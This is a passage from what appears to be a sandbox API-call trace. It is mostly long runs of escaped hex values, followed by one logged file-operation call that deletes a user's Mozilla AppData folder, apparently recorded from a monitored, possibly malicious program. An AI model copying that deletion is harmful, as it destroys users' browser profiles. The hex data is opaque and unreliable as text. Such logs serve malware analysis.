764\x720f\x5055\x7a5\x2ed9\x6e82\x505b\xe57c\x3c16\x12b2\x8b1a\xa845\x58d5\x82c2\xd8e0\xe6a7\xefa3\x7bda\xda66\x7fe4\xc7a2\xead0\xa1cf\xc19a\xc050\x2822\x1e80\xddc4\x109b\x2ee1\x9565\x65a3\x67e1\x81d7\x39bb\xc826\xdd7b\x96e3\x62e4\x1b44\x67e1\xdf52\x5c82\xb9f3\x5007\xaa8a\x81f2\x6ee6\xf5ae\x4f64\xc937\xc6ec\x9c93\x91cd\xbe92\x5ae5\x3d9a\x20ef\x7816\xd510\x97f9\x926\x3608\xa34a\x9175\x1a58\x3d89\xce24\xbb18\xbd20\xed5a\x2174\xed96\xeb62\x20fc\x2c83\xf4da\xfa2d\xa41d\xfcad\x3087\x8407\x808\x2762\x587f\xdd3a\xeb0b\x2c28\x79c2\x92eb\x92ab\xe416\xeb66\x2a69\xd8b4\x4984\xb3ab\x8bf8\xc86a\x6ff8\xa2a1\x4f92\x2d70\xcbca\x7aab\x9dc3\xb30d\x8ac1\x7771\xc43c\xe4d7\x2819\xb746\xb468\xcf86\x99a2\xea36\x621f\x8eb\xd67\xf9a5\x7bb1\x3484\xf38f\xd20a\x483c\x8bf1\xdd40\xcd2c\xa889\x779a\xf5d5\xd548\x4bc\x1af6\x73b4\xd9e7\xcf91\x2f9c\xcd72\x22f9\x8fef\x148f\xb751\x9461\x8fd8\xfda1\x9f85\x1f44\x8b10\x3ae\xc602\xc3a3\x335\x238\x9dc7\x3833\x8ac9\xd2e2\xb129\xc174\x361c\x3fb9\x7417\x204f\xa22d\x1f0b\xcd09\xa276\x9b7f\x75c4\x78cf\x31c3\x6faf\x5c68\x7539\x2213\x38e5\x6585\x942b\x57e6\x4e65\xdb2f\xa1bc\xec9\x99a4\xccab\x56d\x5ad6\x3241\x9457\xb1c\xc7a9\xee8c\x4b7e\xaa13\xa153\xbaf8\x5af2\x2a2f\xa8ee\x1b68\xfb27\xcaaa\x5ac4\x2824\x7a95\xd9b7\xde50\x8ad1\x71d4\x143e\xf68b\xd66a\x555a\x98d9\xc037\x6ca7\x9d9c\xf500\xfba5\x35ad\xcabe\xfac3\xb445\x4530\xecf3\x492d\xc4a2\xdd61\x79a1\x94f6\x55f4\x6b71\x26b9\xe7c3\x2e69\x24f9\xf7bb\x815\x76f1\xd477\x2e15\x1bfc\xc6ca\xec2d\xae1a\xe824\x4823\x11e6\x183c\x3103\x506b\x4219\x355f\xe79a\x65ae\x4fc3\x1ab4\xb2ed\x6b70\x65e8\xa747\x9bb5\x6e0a\x4a03\x75ca\x56e8\xcce\x38c8\x6d62\xaecc\xcf29\xabc5\x254\x9b29\x2d93\x9d08\xae9a\x593c\xcbd3\x131f\xc4a5\x2161\x864\xd934\x7b4c\x75e5\xf694\xb1d0\xa8b4\x8481\x38e6\xa860\x4a92\x7bfe\x5d56\x3fc2\xcf74\x647c\xcb9f\x8f5f\x5bb8\xad9a\x8961\x10a1\x9eb6\xcdcf\x271c\x41df\xe56c\x1b17\x134\xf78\x2f80\xaf9\x77a4\x3f91\x7a94\x5380\xf64c\x7ceb\xa45b\xbe62\xee7c\x1e1e\xa254\x4af3\x4606\x412a\x4df\x4434\x1545\x4b0b\x5f9c\xaa6f\x3e7f\xadea\xf534\x2c56\x1cca\xc9f5\xc26b\x2d77\x1735\xc1c3\xebd4\xc3c5\x1e23\xe6e3\xcb8b\x7019\xa21c\xb22c\xc4c7\x4596\xf90f\x8fb2\x2f79\xcfbe\x30bd\x4db\x6825\x766e\xdd17\x7c63\x5161\xb62a\x7e23\x617c\xefd1\xafc1\xfc02\x6d9a\x617c\xa7d5\x5f1b\xf4d8\x8d2b\x122f\x81f4\xee6\x2c7d\xe3bb\xd307\x188c\x875c\x371c\x70cd\xb01e\x4dbb\x70f3\x538c\x9ff\xe8f\x39ca\xd8cf\x4537\xdfd4\x11e1\xe5e\xdfe1\xf08b\x1833\xc45e\x29c6\x33c2\x950e\xa346\xecd1\xc458\x5e77\xbfd7\x39c8\xeda\xc8ad\xb89e\x925f\x6f72\xe9b5\x7017\x79af\x1260\xedb5\x6236\x46dd\x8d3c\xac25\xb057\x8ed4\x2cc9\xbf80\x7a1\x51d\x86f4\xbb0\xbb2a\x5458\x436\x5b1e\xf6f9\xf406\x4cd3\xebfb\x915f\x75f3\xdfb\xe653\x3d3e\x5d\xa829\x334\x6a49\x66e8\xfb2b\x7bef\xec40\xa695\xee\x3d2d\x3a15\x5eb6\xcb7d\x7d9\xe446\xf274\x6cd2\xf955\x7c3\x57a5\xf468\x686f\xc3a4\x9cc3\xc419\x13f8\x3be\x11d8\x4698\x6ed7\x4ac0\xeebc\xd85\xedfc\x8d1\x9720\x4ea6\x7da\x7e3c\x9a0f\xa86b\x46fd\xb778\x7a36\xacf6\x9cbc\xed14\x7ae0\x5ad5\x61de\x5e63\x43a3\xb732\x6705\xa240\x81d4\x2890\xfbc\xdb97\xff6f\xaa82\x261\x934\xa93d\xf97e\x69b5\x9962\xf4a9\xac69\x3682\xe6ab\xb0c1\x3f9d\x89a0\x23ca\x397\x61c6\x1533\x463\x69bc\xde41\xc854\x54a0\x47f6\x60b7\x5b68\xb790\xc3ad\x7dca\xe2ba\xef3c\xe2b2\x772c\x3e80\x45a9\x1b11\x319d\xb83e\x750c\x1e2\x609b\x4dc6\xaf76\xed0d\xa5f2\xc4cb\x42d6\xf0b6\x8e7e\x73e1\x9abd\xa12e\x4cab\x1ae5\x8c44\xbc5c\x3fb\x31cf\xf5d3\x7c35\xf70b\xa002\x6a97\x36fe\x41c5\x693c\x1bf\x52c5\x481f\xd0cb\x5412\xff69\x3406\x8093\xcd83\x9123\x6163\xdbf6\x4250\xcdca\xa077\x73ff\x93be\xf156\xa964\x313b\x1f59\x8a36\xc59f\x8dc5\x29ba\x5a4e\xa08e\x2d57\x8181\xa346\xc825\xf503\xe9f9\x3872\x7151\xbe5a\x5651\xa4cb\xae97\x2793\xa936\xd95d\x197b\x4432\x9463\x1eff\xc719\x4ce8\x7fa0\xfd83\x7bfa\xc744\xb4cc\x30ed\xe1ee\xe334\xff4\x181\xf60d\xb191\x3fe8\x3442\xb6d\x320f\x7f4e\xe81f\xe68f\x571e\xdd83\x811e\xd9d2\x32b6\xd1d0\x3d25\x1d05\xb227\x978c\x25b0\xf03f\xf3ca\xd4e6\xd8fd\xf1d\x5ba1\x9d3\xfe3d\xccb6\xbf71\x4bd9\x85df\xb586\xe78c\x1b63\x955a\x8242\x6d13\xb824\x5d6\x6dbc\xee13\x28a2\x6b1b\x7c16\x57f3\xa7e4\xc237\x64e8\x599e\x1b67\x55e\x647a\x5a1d\xbe43\xa121\x6c7\x3143\xb19b\xeb35\xb96c\xccfc\x3115\x77\xbce0\x9026\xf19d\x56be\xd7a1\x65dc\xf6c2\x2657\x7f6c\x39a5\xdb51\x315f\xb4f7\x493f\x36fd\xdeae\x699b\xfe1b\x492c\x245b\x9aee\x54ac\x158c\xd59b\x5da8\xc957\xf6b8\x7ad7\x4aea\x5bbe\x75e7\xaacf\xbaf7\x5d8b\x6598\x7856\x1784\x9ef\xde51\xc6c\x7aa7\x4b9a\xd2fb\x7ada\x4a6f\xcbb1\x4904\x71af\x97c9\xd8c4\x5966\xa967\x9a8\x4fbc\xd927\x4db8\xf711\x8be4\x96c5\x657c\x85b1\xdfdb\xbe22\xc2f9\x36b8\xe348\xc7c6\x93c\x1032\xcfa\xe8e\x2adf\xf90f\xb98a\xcc0a\xcbb7\x45b1\x5a5e\xdd97\x2fc4\xd9a2\xffef\x2c91\xc595\x7250\x5cef\x356a\x5dee\x3245\xe73e\x4e47\x2be6\x42d6\x62a1\x757e\x2c03\x4f1b\xa361\xe848\xc1e6\x665a\x974b\xd645\xca93\x38fa\x75d5\xc75e\xe1e7\x2ed4\x458b\x9677\x71f5\xb041\xe7cf\xe555\x4a38\xc4e1\x72fa\x13b1\x3dc7\x2cb1\x6cc4\x340e\x6f85\xf904\x4a02\x86f0\xbc26\x86a0\x5cf2\xf746\xa5e0\x280e\x3426\x15c1\x514e\xd431\x4a17\x4d09\x3f68\xcab\xad10\x8460\x95f7\x1034\x2a1a\x988e\x9d3c\x428d\x2a48\x998b\xcf3c\x43f2\x98e3\xfec6\x87dc\x6ecb\xb534\x340a\x4aed\x4f4e\x59c8\x91ab\x2538\x3edc\x167e\x3389\xdf7c\x54a6\xbb2e\xe51f\xa886\x417\xe2c1\x78f8\x3586\xd200\x13e9\x8fb8\xa75c\x1c99\x818\xc962\xe393\xc990\x2ca2\x69e7\xedd4\x92ac\x5f71\xdfc7\x7623\x1f06\x79e1\x7da9\xf3d\xdd79\x9d59\x70a6\x1187\xfc35\x98ee\x57f0\x8475\xb8a6\xf3d8\xe2ad\x217e\xc700\xb7f6\x7b63\x3d44\xf277\x5644\x93af\xd1aa\xb262\x7e36\xb37c\xa593\x6673\xfbf6\xbe6a\xc257\x7e06\x9a6f\xda5e\xc9e9\x29b7\x8715\x7f71\x320\xce65\xb947\xb241\xdb2d\xf2e4\x237f\xb6a7\xa2b5\xcd7d\x5ba1\x306c\x2b0d\x6dd0\x5d05\xd056\x573\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x9d45\xb7eb\x4236\x3154\x7544\x59e2\x2049\x8db7\xbbd\x3422\xcf0f\xb93f\x1e82\x7810\x1054\xefe3\x1195\xbba3\xe051\xe34e\x78ed\x5aac\x96ac\x23c4\x9d4b\x9f66\xbf40\x9448\xb3df\x861b\xcc74\x78e7\x1135\x5def\x69a7\x5aed\xf38b\x5166\xed2a\x6e32\xbc96\x45e5\xa52d\xad12\xef61\xa0e0\xf142\xbeb3\x8980\xf9a3\xd036\xef77\x2590\xef9a\xda08\xdca7\x9381\x2064\x83d2\x3228\xa315\x820f\x505e\x8af5\xe269\x637a\xb29c\x4caf\xd583\xd948\x9de8\xb292\xd40\x9056\x200d\x987e\xc2db\xd09f\x883\x3f2f\xdc85\xe569\x9005\x9d64\x7077\x84fa\xaaa\xef39\x9e49\x63e0\x4ef4\x372f\x3311\xe57\x4524\xeb2d\x62a\x723\x14c2\x4f85\x8a41\xf086\xb047\xaf02\x2f1f\xb04b\x77be\xb52a\xd9b2\xbd88\x5d4b\x3105\x77a2\x3e33\xdec3\xbb0d\x3c7f\xdd76\xcd0a\x247f\xe20c\xa644\x6dd1\x2e06\x2181\x7b19\x263d\x48fc\x3ee7\x191a\x9690\xfa7d\x546d\x8f2\xb3db\xa261\x554d\x5cb8\x1dc4\xc202\xd873\xc5b3\x569a\x9117\xee7f\xbb73\xfce2\x2130\xfdad\xd9d7\xfe11\xddc6\xdfdd\x4767\xa24e\x8882\x12d3\xc548\x6eca\x653e\x1d9a\xb5e\xcc4e\x23a8\x3130\x4bf4\xab75\xe4d8\x9edb\xa39b\xa054\x9b2b\xfd6a\xc40a\x2cdf\x7e3\xc97b\xd0d1\xe923\x5816\x3d7b\xca0d\x9c5a\x6554\x8b63\x5699\x8afc\x9160\x5936\x4658\x685d\x2d15\x448d\x38a\x53da\x71d2\x4eb\x9787\x7fbd\xf01d\xe5a1\xedc0\x85ff\xe4f3\x85cd\x5591\xfed6\x6229\xbd54\x2f24\x7747\xa25f\xe6e7\x94e5\x7ac8\xf2b6\xc3e6\x7032\x8b54\xd3d7\x74b0\xee18\x900e\x7e50\x13a\x3db9\x5bb3\xa50d\x58dc\xb0e6\xadf9\xfe0d\x96cc\x77c0\x6fc8\x72f2\x4c6\x6980\xfe5\x74d9\xdd06\x1c5e\x288e\x4e90\x95b1\xbc77\x2b02\x4829\x1d76\xdd36\x7465\x82a4\xddde\xdba4\xad09\x8f0f\x3180\xdd5a\xa304\x183c\xc1ef\x17c2\x64c0\x1dfb\x92f8\x2f08\x135a\x12e2\x2947\x706f\x23b9\xd6c\x3a96\x6848\x8a79\xb1b2\x2f9e\xb054\x754a\x7560\x63b9\xb8bf\x964d\xca94\xa33f\x383f\x78c8\x9edf\xeddd\xaf4f\xac05\xb77d\xf800\x53ae\x5d0b\x7288\xbde4\xe730\xe36f\x8015\xdafe\x6d4f\xd605\x3f66\xa3dd\x5ce6\xe7ad\xbef1\x8f5f\xc6fd\xc4c5\xa9eb\xea59\x85f6\x650a\xa055\xe967\x7520\x825d\xdacf\x3aa0\x43bc\x31d2\xcf81\x107a\x2cd2\x8f69\x410e\xdf8d\x75a8\x5814\xf84f\xbf33\xbc0a\x306\xcd8d\xff2e\x778a\xb47f\x95f1\x1f4d\x7c6a\xaa95\x9aa7\x12d\xf9e8\xdc58\xc29e\x8f9e\x1bd5\xcf45\x16c7\x8a35\x8f9e\xd69d\xab88\xe1c0\x3cc8\x5f41\xa652\xc684\xdc8d\x562c\xaf67\x8dd2\x9b07\x7e43\x3f8b\x60f3\x2be0\xa444\xbba7\x6771\x9c57\x2e1\x5d66\xdb4\xb599\x39d8\xcf85\x1222\x35dd\xce15\xe7b6\xab8\x21d\xbb3d\xe97d\x8e0a\xa07b\x1068\x77c5\x812\xf5e8\xf95b\xa709\x8b80\xfead\x34d2\x56c5\x745\x71be\xcab3\x4d57\xecc8\xab52\x9120\x1b46\xdb70\xfed3\x4c72\xbed4\xd73c\x1ee\x800e\x4fae\xeccd\x6fc1\xd4f0\x9e81\xfe1a\x5b2b\x1c77\xb09\x2c37\xead8\x2bd8\x4262\x367f\x5205\x5fb1\x22c6\xbaa3\xbc59\xd22f\xeff9\xfaaf\x941a\x59e1\x3c56\xd529\x3514\x54bd\x12f5\x73f2\x4173\x9e7\xe1ad\x21f2\xf8c8\xd928\x8d1f\x4186\xb7ac\xdc01\xa7ea\xf1e8\x54aa\xc4dc\x166d\xa3aa\x8b00\xd151\x6248\xdb74\xa903\xd05a\x80ef\xf415\x8efb\x112c\xb25\x6265\xaf04\xafe7\xf2af\xebe5\x5c5f\x7e0e\x6c8\xf082\xb8d7\x96ab\x6bc5\x8437\xbde0\xa9cd\x3505\x374b\x3f29\xd585\xf8ae\x3cbc\x31f7\xaa49\x5ba1\x5050\x280e\x60d\xd3e\x9a14\x825f\xf2af\xf5dc\x8c00\x9746\xf463\x1e3a\x38fd\xa746\x6888\x32dc\x2f0e\xcf29\x75fd\x5c5c\xc625\x53dd\x1b9e\x8b8a\x3143\x7c39\x7953\xafee\xe2e2\x62d6\xf5dc\xb9e5\xc44f\x61c5\xe10d\xca4b\xff73\xe96d\xb89\x5c61\xf2ff\x37dc\x2e30\xc449\x863d\xc02b\x37af\x4f44\xa8dc\x6b66\xf790\x9c22\x8384\x204\xc41c\x2090\x931f\xb68e\x233\xcf2d\x1923\xa356\x8403\x31a7\x4890\x3b1b\x3cdc\xe819\x3804\xa303\x2165\xf40b\x26e0\xe7f5\xf6a0\x676b\xb68f\xca23\x214d\xb422\x844a\x8b66\xb150\x2d08\xa114\x447b\x58a8\x6684\xd088\x1132\xc89a\xb443\xa22c\xdb54\x58d9\xf111\xb8a2\xe2cd\x77ba\x5a39\xfc40\x8830\x9adf\x162a\xf9fc\x729f\x8549\x490a\x4505\xc811\x217a\xa42e\x2083\x37cf\x71d9\x4a02\xfb02\x11cf\x1d5c\x985b\xbfeb\x2c40\xd91c\x112f\xb7d9\x9c70\x3d03\x132b\x128d\x1eb9\x69ac\x177c\x7e30\x87d\xf294\x783\x80f\xeb76\x8d7d\x411b\xc0fd\xab14\x2573\xbd69\x6128\x973f\x9a2d\xd559\xa111\x4554\x2289\x17a6\xd4d1\xaea7\x2585\xa4f0\x8fa9\x8140\x2fa7\xf7b\xa76a\x65a9\xcad7\xe0fc\x5ed6\xc9f6\x457f\x4f09\xf0b\xd8b4\xcbe\x2c1b\xcf45\xe0e1\xaabe\x593\xa21a\x30d7\x9a42\x1b1e\x9987\xc1f6\x30f3\xa916\x4257\xb489\x2d9b\xc5e5\x5cf1\x6093\xe075\x7aa7\xd258\x68e1\x3ea4\xa686\x78da\xaddd\xa16c\x39a8\x9c72\x4ae7\xe4ae\x3cd4\x648f\xc531\x661\xe1ad\xf644\x8fcf\x300\xe30e\x95d2\x3bf1\xace9\x957b\x9e76\x5feb\xb219\x5e3f\xfdc7\x7175\x8cce\x9dbb\x8352\x217a\xd877\x8ae3\x7719\xc3d8\xe0b\x417\xe7cb\xc371\xf968\x392f\xb517\x194f\x4283\x3962\x449f\x25e3\x6d14\x2125\xae26\x98fd\x8fcf\x421\x48a0\xdde4\x469f\xefa7\x1c17\x8c1c\x5f4e\xd800\xfd9a\xebc6\x2cb1\x4783\x8a51\xe60f\x2ebd\x5d36\x3ea3\xd315\xd674\x4ed9\x5df6\x703d\x57b9\xe13e\xf10c\x124e\xed4a\x1a03\xfb2f\x1216\xed07\x5def\xf323\x193\xf893\xa50\xc85f\x87cd\xe362\x4599\xdf53\x46b8\x678c\x7ffa\xfe78\xc48b\x7bb5\xe11f\x32dd\xc569\xc5cf\x53c6\x7598\x5912\xa89f\x2cf6\x33fc\x668f\xd4d0\x6b92\x8a04\xb0a4\xa1e7\x234e\x6ef5\x7308\xb62f\x468e\x224\x6348\x4da6\x9e7c\x412b\x9178\xfda6\xd32f\x5d61\xaa7d\xd696\xfb0a\x31a3\x59ea\x9088\xf97a\x4556\xe6e5\xaeb9\xe588\xfca7\xd0a8\xe7c4\xc9b9\x64a6\xc4ec\x2868\xfd7a\xd9d6\x4848\xbd07\x7a1\xf11a\xde7c\x6dc7\xb1d8\xae46\xf90f\xffb2\x5883\x9834\xd284\xf892\xee68\xff64\x1cbc\x7246\xb23d\x17d8\x3c84\x3579\xebd4\x5e0d\xd171\x602f\xec04\xb252\xdce0\xbb9\x2560\x9296\xd188\xf4c7\xef06\x294e\x3bbb\x6ca7\x9a9d\x5ee3\xa55d\xe6\x3724\x929\xb62\x55bd\x6b77\xfd78\x6e10\xc2c9\xb1b4\xb269\x7e14\x550b\x5049\xad32\x6830\xbc0b\xafb9\x9fb8\xb6e0\x9f7\x9d9c\xb857\x159f\x8917\x152a\x7357\x7b1b\xdb1\xe1ef\x21ca\x5945\x6b7e\xae17\x793c\x56ea\x7abc\x9bd7\xe39b\xb455\x2d9c\xeedc\x5303\xcded\xbf1d\x816a\xad2c\x252c\x6b68\xc5df\x387e\xd3d8\x6e47\xf561\xf1d2\x4077\xf082\x5234\xfb4\xe344\xa03b\xfe29\xada0\x2bd5\x315f\x171\xee1a\xad6d\x7d3d\xecbb\xbedc\xbf9d\xe14f\xb306\x5c2e\xd2a6\xbdef\x8b78\x16a0\x22ba\x8a01\x3d55\xcae6\x84a5\x25f6\xd521\x6042\x5ab9\x5532\x4aed\xf590\xf029\x8ed\x9924\xbf69\x2dfc\x90b7\x407a\xc69c\x5b43\xddb5\xe376\xe1e3\xd164\xd9a1\xeb7e\xefed\x914a\x9ae3\x2409\x568\xa779\x1f2a\xae84\xce29\x2398\x9bc1\xc40\x7e66\xd98a\x7280\xdfb9\x17ac\x6383\x73d4\x2289\x5c2f\x6d11\x5f8a\x7adc\x9864\x2556\xf784\x9207\x13a2\xd164\xb347\x7589\xbcd8\x72a9\xeb4\x82b\xa2b7\x4e85\x9de5\x877c\x99b2\x4225\xfc7d\x5c10\xbe7d\x3ca3\x8934\x549f\x6a33\xabbf\x82ee\x2ab2\xc54d\x68db\xdda6\x1bfe\xa971\xa00\xc6a5\x7949\x44c9\xb87e\xe9ff\xf0df\xe53e\x416a\x5d90\x8c6b\x4b6e\xfa0\x6916\xe634\x5385\x6e8c\x206b\x8449\x671c\xe7f7\x76b3\x9fde\xc5f0\xd491\xd700\x8f50\x3fb2\x4335\xd058\x6ef1\x4e8a\x706f\x85d9\xcba2\x971d\x7a41\xd981\x1e37\x85c1\xd50b\x1ae2\xb52e\x1cf\xb895\x334\xe354\x2ac\x945a\x7313\x3b55\x2f8f\x905\xbf8d\x50b3\xde96\xe3c9\x3f08\xd51c\xebdd\xc848\xd9c0\xf0f\x9633\x48a7\x127a\xd236\xeb4c\x67c\x2413\xa312\x766e\x3914\x4ada\xe140\xd851\xe42a\xc60d\x12a5\xcb3f\xee6c\x540e\x239f\xc530\x65d9\xa351\xc635\x988f\x668f\x3b36\xe47b\x9e28\x1db0\xc1ff\xe8d4\x11de\x4e8a\xeb07\xbbed\x7501\x3780\x78cf\x9f96\x3fc5\xb680\xe0cd\xf7f8\xf8f2\x1045\xbdba\x23cc\xac05\x1e84\xdf41\x822b\x8c46\xb13c\x2183\xb22e\xb174\x3e72\xb8c9\x6fc2\xc532\x70df\x39e2\x7a5e\x292b\xd0d2\xf32b\x59a4\x137a\xd09\x4e38\x7b3c\x7c4a\x9620\x3bb1\x440e\x595d\xb1f4\xc85a\xd9d6\xae53\xbab8\x9450\xc99a\x2cbd\x4fd1\xfc7b\xd0e5\x3c12\xea96\xc3ca\xe653\x2b61\xe07a\x31e2\x121f\xc5d5\xaaee\xe9fb\x6473\xa2fc\x2b0\x1b3c\xadd7\x971a\xe248\x4f2a\x7235\xa84a\xaf72\xa89e\x2d05\x187e\xecce\x6563\x119e\x7e81\x35d9\xc795\xdef2\x811c\x3017\x7598\x8594\x53af\x4cd\xbd5c\xd713\xab59\x8912\xa0d9\x99bc\x808d\xecdd\xdf4\xf51c\x9ffa\x705\xf720\xae7b\x163c\x7bf8\xd95e\x9719\x9e\x7ddf\x7f02\x34c0\xea7d\x9927\xd852\xcc4a\xece6\x182e\xa558\x7d02\xcb4e\x2e3c\xe61c\x13e\x643b\x1f0d\xf1e7\xc2f5\xac76\xfa27\x3783\xdb62\xd354\x8ee6\xaa18\x98c2\xaccc\xf32d\xaedc\x6177\xc783\xec56\xc08\xecab\xa902\x943b\x972f\x8ce5\x6280\x5b68\x1938\xa927\xbb2\x417a\xf73b\x8474\x669d\xd613\x509f\x789f\x343b\x5a11\x120c\xd1fe\xd675\x1a8a\xab5d\xaec\xc638\x74b9\xb8ef\x7a3e\x8c1e\x35c6\x3bca\xcc8d\x8375\x5890\xa086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae") | out: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2a07\xeaf7\x3483\x4f5a\xa1f7\xf2a0\x702d\x48db\x98b4\x27fa\xa2b8\x811c\xfe6e\xa018\x8dd\x4e35\x81cb\x206b\x9009\x7d4f\x5ef6\xfd84\x601e\xc0b1\xc8eb\xa9b4\x727d\xb6b4\xc028\x56c\x67de\x4e37\x35b\xc5d7\x2d0a\xb487\xac20\x8d34\xa16c\x8327\x9880\x85fa\xd390\xc919\x8ce9\x8326\xf2d6\x698a\x8803\xc042\x9f06\x5777\xd189\x442d\x515b\x79dd\x1ed\x96b4\x389c\xfe44\xee8c\xa029\xaf84\xe75f\x6624\xc54d\xfd5e\x57ae\x313\xf8df\xcdab\xfc33\x956f\x8b7f\xf324\x72bf\x9d42\xb9b8\xd461\x3438\xeeb\x6272\x3faf\x8f7b\xe47f\x1d3e\xb474\x6ec2\x37c8\xa2b5\x9f4b\x6a44\x70bf\x7bc2\xbc2e\x155f\xbf79\xde18\x8907\xa4d7\xae8a\x26c0\xf212\x66ca\x7e1d\xe19f\x3fdf\xeff0\xf9ef\x69f7\x7dfe\x7f8a\xe49f\xdddf\xbf9c\xd10b\xba35\xaf3d\xd864\xff87\x417\x8cec\x8cd4\x62ff\x703f\x5125\xfb46\x206a\x52fe\x1f8c\xd05d\xb00a\xf9cb\xfab\xba74\x4e82\xd3dc\xd819\x7165\xfdea\xef70\x2b